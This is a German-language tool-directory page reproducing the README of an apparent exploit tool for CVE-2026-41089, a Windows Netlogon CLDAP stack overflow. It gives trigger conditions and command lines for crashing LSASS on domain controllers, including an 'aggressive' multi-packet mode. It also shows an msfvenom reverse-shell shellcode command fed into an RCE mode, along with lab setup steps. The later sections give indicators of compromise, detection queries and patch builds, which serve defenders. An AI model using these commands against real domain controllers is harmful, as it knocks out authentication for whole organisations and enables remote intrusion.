Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41089 — CVE-2026-41089 ist eine kritische Remote-Code-Ausführungsschwachstelle im Windows-Netlogon-Dienst, bei der ein einzelnes Paket ausreicht, um lsass.exe zum Absturz zu bringen und den Domänencontroller innerhalb von etwa 30–60 Sekunden neu zu starten. Während dieses Zeitraums schlägt die gesamte Domänenauthentifizierung dieses DC fehl. | Kitploit
Tools/GitHubGitHub/hnytgl/cve-2026-41089
SchwachstellenanalyseExploitationPenetrationstestsRemote-Access-ToolBinary-Exploitation
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Repository anzeigen
141214vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-41089 ist eine kritische Remote-Code-Ausführungsschwachstelle im Windows-Netlogon-Dienst, bei der ein einzelnes Paket ausreicht, um lsass.exe zum Absturz zu bringen und den Domänencontroller innerhalb von etwa 30–60 Sekunden neu zu starten. Während dieses Zeitraums schlägt die gesamte Domänenauthentifizierung dieses DC fehl.

Teilen

CVE-2026-41089 — Windows Netlogon CLDAP Stack Buffer Overflow RCE Exploit

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (Stack-based Buffer Overflow)
Angriffsvektor: UDP/389 (CLDAP SearchRequest)
Auswirkung: Remote Code Execution (RCE) / Denial of Service (DoS)
Betroffene Versionen: Windows Server 2012 R2 ~ 2025 (Domain Controllers)
Patch: Kumulatives Update Mai 2026

Schwachstellenübersicht

Die Funktion NetpLogonPutUnicodeString in netlogon.dll weist einen Stack-Pufferüberlauf bei der Verarbeitung von CLDAP-Suchanfragen auf. Die Funktion erhält ein Byte-Längenbudget, interpretiert es jedoch als WCHAR-Anzahl, was dazu führt, dass die geschriebene Menge doppelt so groß wie erwartet ist.

Der Überlauf tritt in einem 528-Byte (264 ushort) großen Stack-Puffer innerhalb der Funktion NlGetLocalPingResponse auf. Das vom Angreifer kontrollierte User-Feld zusammen mit dem eigenen DNS-Domänennamen des Servers füllen diesen Puffer und überschreiben schließlich das GS-Sicherheits-Cookie, was zu und einem Absturz von führt.

__report_gsfailure
lsass.exe

Auslösebedingungen

  • CLDAP SearchRequest mit NtVer=0x02 (erzwingt den alten, anfälligen BuildSamLogonResponse-Pfad)
  • User-Feldlänge ≥ ~130 Zeichen (binäre Obergrenze etwa 260 Byte UTF-16)
  • Server-DNS-Domänenlänge ≥ ~80 Zeichen (je länger die Domäne, desto leichter wird das Cookie erreicht)

Hinweis: NtVer=0x16 (von vielen öffentlichen Erkennungsskripten verwendet) löst den sicheren BuildSamLogonResponseEx-Pfad aus und löst die Schwachstelle nicht aus.

Funktionen

ModusBeschreibung
--mode dosSendet ein speziell präpariertes CLDAP-Paket, das LSASS zum Absturz bringt und den DC neu startet (~60 Sekunden Ausfall der Authentifizierung)
--mode rceVersucht Remote Code Execution (Forschungsstufe, erfordert Shellcode)
--mode scanScannt die Antworten auf verschiedene NtVer-Werte und führt einen Fingerprint des Ziel-DC durch
--mode autoAutomatische Erkennung und Auswahl der besten Angriffsstrategie

DoS-Modus

Ein einzelnes Paket bringt lsass.exe zum Absturz, wodurch der Domain-Controller für etwa 30‑60 Sekunden neu startet. Während dieser Zeit schlagen alle Domänenauthentifizierungen auf diesem DC fehl.

root@kitploit:~
# Basisnutzung — 3 Pakete senden
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Schneller Einzelpaket-Angriff
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Aggressiver Modus — 5 Pakete parallel
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

RCE-Modus

⚠️ Forschungsstufe — unzuverlässig und instabil in realen Umgebungen.

RCE steht vor folgenden Herausforderungen:

  1. Die Überlaufdaten sind der eigene DNS-Name des Servers, nicht der Shellcode des Angreifers
  2. Das GS-Cookie muss umgangen werden (erfordert eine Informationslecks-Primitive oder Brute-Force)
  3. CET/ACG/CFG unter Server 2022+ erschweren traditionelles ROP
root@kitploit:~
# Shellcode generieren
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# RCE-Kette senden
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Scan-Modus

root@kitploit:~
# Fingerprint des Ziel-DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Erwartete Ausgabe (gepatchtes Ziel):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Erwartete Ausgabe (ungepatchtes Ziel):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS abgestürzt!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Wenn NtVer=0x02 ein Timeout liefert, während andere Versionen normal antworten, ist das Ziel wahrscheinlich anfällig.

Erweiterte Parameter

ParameterBeschreibungStandardwert
-l, --user-lenLänge des Benutzernamensfelds (ASCII-Zeichenanzahl)180
--ntverNtVer-Wert (hexadezimal, z.B. 0x02)0x02
--countAnzahl zu sendender DoS-Pakete3
--delayVerzögerung zwischen Paketen (Sekunden)0.5
-t, --timeoutSocket-Timeout (Sekunden)5.0
--jsonAusgabe im JSON-Format—
--rawRohpaket vor dem Senden als Hex ausgeben—
--quietBannerausgabe unterdrücken—
--shellcode-fileBenutzerdefinierte Shellcode-Datei (rohes x64)—
--lhostReverse-Shell-Listener-Adresse—
--lportReverse-Shell-Listener-Port4444

Testumgebung einrichten

root@kitploit:~
# Erstellen Sie einen DC mit einer langen Domäne auf einem ungepatchten Windows Server:
# 1. Zum Domain-Controller heraufstufen (DNS-Domänenname lang, z.B. "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Sicherstellen, dass Patches vor Mai 2026 installiert sind
# 3. Vom Angreiferrechner ausführen:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. DC-Absturz und Neustart beobachten

Indikatoren für eine Kompromittierung (IOCs)

Netzwerk

  • CLDAP SearchRequest auf UDP/389 mit User > 100 Byte und NtVer = 0x02
  • Ungewöhnlicher CLDAP-Datenverkehr von Nicht-DC-Hosts zum DC

Host

root@kitploit:~
Ereignis-ID: 1000
Fehlerhafte Anwendung: lsass.exe
Fehlerhaftes Modul: netlogon.dll
Ausnahmecode: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Erkennungsregeln

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Patch-Informationen

Windows Server-VersionPatch-BuildnummerHinweise
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Rechtlicher Hinweis

Dieses Tool ist ausschließlich für autorisierte Sicherheitsbewertungen, Penetrationstests, CTF-Wettbewerbe und Abwehrforschung bestimmt. Die Nutzung dieses Tools gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal. Der Benutzer trägt die alleinige rechtliche Verantwortung.

Referenzlinks

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
Tool herunterladen